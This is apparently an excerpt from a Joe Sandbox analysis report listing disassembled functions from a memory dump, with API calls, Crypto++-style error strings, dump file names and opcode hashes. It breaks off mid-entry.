                                                                                                            • Part of subcall function 6F024010: _memmove.LIBCMT ref: 6F0240C8
                                                                                                          Strings
                                                                                                          • CryptoMaterial: this object does not support precomputation, xrefs: 6F021ED4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                                                                                          • String ID: CryptoMaterial: this object does not support precomputation
                                                                                                          • API String ID: 2192554526-3625584042
                                                                                                          • Opcode ID: 319f2aa52bfd4e352f0bc7709e9ebe5dcde18adcea3b33c4a039049a3a6d7036
                                                                                                          • Instruction ID: 85ea1fb94ec0a984f5af1286598a2cacd8841cf3beab9936bb468d5901fcd24b
                                                                                                          • Opcode Fuzzy Hash: 319f2aa52bfd4e352f0bc7709e9ebe5dcde18adcea3b33c4a039049a3a6d7036
                                                                                                          • Instruction Fuzzy Hash: 48313C75804248FFCB14DF98D880BAEFBB8FB49724F10466EE425A7691DB759904CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F033317 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F033327
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F03336B
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argumentstd::_
                                                                                                          • String ID: vector<T> too long
                                                                                                          • API String ID: 1735018483-3788999226
                                                                                                          • Opcode ID: 010db1fc775afe02ac39b88ce5f4069bef493e1a7c2c0fab7498b9c07335ac96
                                                                                                          • Instruction ID: e300073e48fd9f1235af3d0a5e3f33fd6a3740149b1980702eb1a95140b25823
                                                                                                          • Opcode Fuzzy Hash: 010db1fc775afe02ac39b88ce5f4069bef493e1a7c2c0fab7498b9c07335ac96
                                                                                                          • Instruction Fuzzy Hash: 14310872E046199FCB14CF98D9C1B9EB3B0EB09324F108269E85A9B380D731BD00CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04D790 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F04D861
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04D878
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: 51d2ed262cb20454e9f90c98961438b5f18cd8e55fdb5afd5bc287c138219d5d
                                                                                                          • Instruction ID: 819f1a8c5e274466d1909e7d42ec60f6f8936cf0ced482add105f78990deb0ec
                                                                                                          • Opcode Fuzzy Hash: 51d2ed262cb20454e9f90c98961438b5f18cd8e55fdb5afd5bc287c138219d5d
                                                                                                          • Instruction Fuzzy Hash: AF3182715087459FCB04CF18D880A9AB7F5FF89724F408A6EF86587790D734E905CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F045810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F04584D
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          • VariantClear.OLEAUT32(00000000), ref: 6F045899
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
                                                                                                          • String ID: vector<T> too long
                                                                                                          • API String ID: 2677079660-3788999226
                                                                                                          • Opcode ID: 400dafab680657b0a1b935eb7738fdb637ed5a3c27636f5f1524ecad74eac1a9
                                                                                                          • Instruction ID: bd0a6df265415deba28432367750f2c018e13c96f7f3e020f03e6e21113b6213
                                                                                                          • Opcode Fuzzy Hash: 400dafab680657b0a1b935eb7738fdb637ed5a3c27636f5f1524ecad74eac1a9
                                                                                                          • Instruction Fuzzy Hash: 1A216275A04609DFD710CF6CC880B6EB7F5EF44764F10463EE465A7780DB34A9008B90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F035750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F03576B
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F035782
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                          • String ID: string too long
                                                                                                          • API String ID: 963545896-2556327735
                                                                                                          • Opcode ID: 39d15c97ce5c0515d214b19542aa9b6fda1692053c6c84d6eb8fb12c440b78fc
                                                                                                          • Instruction ID: 5a3e32f2207e35de58c5f4345196e792a893b3790068d122f97d8a4a20b1bf2f
                                                                                                          • Opcode Fuzzy Hash: 39d15c97ce5c0515d214b19542aa9b6fda1692053c6c84d6eb8fb12c440b78fc
                                                                                                          • Instruction Fuzzy Hash: 7F11D6377047229FD3319A9CF880B7AF3E9EF95620F60061FE552C7690C761B80487A1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0246B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F0246C4
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          • _memmove.LIBCMT ref: 6F02470B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                          • String ID: string too long
                                                                                                          • API String ID: 1785806476-2556327735
                                                                                                          • Opcode ID: d1bf4ed519708b1f6f4d67e838453f1808b65bcd6e5eb9c5b12a86d15ee0cf1a
                                                                                                          • Instruction ID: 065805278025d7b8c08f0110205d419b43f4c1e89e99228cb97821d67d7013ee
                                                                                                          • Opcode Fuzzy Hash: d1bf4ed519708b1f6f4d67e838453f1808b65bcd6e5eb9c5b12a86d15ee0cf1a
                                                                                                          • Instruction Fuzzy Hash: 9811897A114714AFEB309D78A8C0B6AB7E8BF56618F200A2FD4A7875C3D761E4488771
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F054D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F054E00
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          • ArraySink: missing OutputBuffer argument, xrefs: 6F054D91
                                                                                                          • OutputBuffer, xrefs: 6F054D77
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                                          • String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
                                                                                                          • API String ID: 3718517217-3781944848
                                                                                                          • Opcode ID: c1603270bf7226db34635c0169d817d7cfc51b8a9810ef23537538a0c91df7aa
                                                                                                          • Instruction ID: 0845231669a682df8997828b6ade5dd16c71424f455cc9aafd03acf6c98b2f00
                                                                                                          • Opcode Fuzzy Hash: c1603270bf7226db34635c0169d817d7cfc51b8a9810ef23537538a0c91df7aa
                                                                                                          • Instruction Fuzzy Hash: BF3127B9508780AFC314CF68C890B5BBBE4BB99714F404A1EF4A993395DB75D508CF52
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F080B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F056480: __CxxThrowException@8.LIBCMT ref: 6F056518
                                                                                                            • Part of subcall function 6F056480: __CxxThrowException@8.LIBCMT ref: 6F056558
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • _memset.LIBCMT ref: 6F080C4E
                                                                                                          • _memset.LIBCMT ref: 6F080C5D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_memset$_malloc
                                                                                                          • String ID: @Ro
                                                                                                          • API String ID: 4112577501-4069190076
                                                                                                          • Opcode ID: 5148685cfa5b93d3e75519e4fba63a39bf4f92966a0bc12b14afe32931235fe2
                                                                                                          • Instruction ID: e15372cbc1c27040fc1c64c8c38d765787ac050267a708963bf79c30b965a2fc
                                                                                                          • Opcode Fuzzy Hash: 5148685cfa5b93d3e75519e4fba63a39bf4f92966a0bc12b14afe32931235fe2
                                                                                                          • Instruction Fuzzy Hash: 8C21F1B12087409FD714CF29C901B56BBE4FF84718F440A6DE49A8B782D7B9E404CB96
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F081710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F08179E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0817B5
                                                                                                            • Part of subcall function 6F0813A0: std::_Xinvalid_argument.LIBCPMT ref: 6F0813BE
                                                                                                            • Part of subcall function 6F0813A0: _memmove.LIBCMT ref: 6F081431
                                                                                                            • Part of subcall function 6F0813A0: _memmove.LIBCMT ref: 6F081456
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2097953723-2241063504
                                                                                                          • Opcode ID: 35af9424f44f00c1aaaadf87265a187ce84daaeab940f49c716c47b01548ad14
                                                                                                          • Instruction ID: dfd485b27d723ae4f139866a193e6ea3e480a6bde4cfb46801fa1159e22ad20e
                                                                                                          • Opcode Fuzzy Hash: 35af9424f44f00c1aaaadf87265a187ce84daaeab940f49c716c47b01548ad14
                                                                                                          • Instruction Fuzzy Hash: 97115675204B059BDB20DF48D880B46B3F4FF54318F44892DD9BA87682D775F909CBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F030150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F030201
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          • StringSink: OutputStringPointer not specified, xrefs: 6F03019B
                                                                                                          • OutputStringPointer, xrefs: 6F03018C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                                          • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                                                                                                          • API String ID: 3718517217-1331214609
                                                                                                          • Opcode ID: 827fe30499aaece408b39d2d6e65e228bad6882ad14511d5fc8afe66cc6bd900
                                                                                                          • Instruction ID: 0be836d15a41290854c26b769e27957b7e82d493e34c9af538974e148a2dc51a
                                                                                                          • Opcode Fuzzy Hash: 827fe30499aaece408b39d2d6e65e228bad6882ad14511d5fc8afe66cc6bd900
                                                                                                          • Instruction Fuzzy Hash: 28214C75D04288AFCB04DFD8D890BDDFBB4FB49318F10825AE825A7396DB356604CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0817C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F08184F
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F081866
                                                                                                            • Part of subcall function 6F0813A0: std::_Xinvalid_argument.LIBCPMT ref: 6F0813BE
                                                                                                            • Part of subcall function 6F0813A0: _memmove.LIBCMT ref: 6F081431
                                                                                                            • Part of subcall function 6F0813A0: _memmove.LIBCMT ref: 6F081456
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2097953723-2241063504
                                                                                                          • Opcode ID: 3bdb124786e42ae7e6a643b267801caf05d0365b43f31e5ba3d3f82178fadccd
                                                                                                          • Instruction ID: 64068dca73590317e4f4e247a45de18dddb600f641da4bc7ebd1aa3fe5e03349
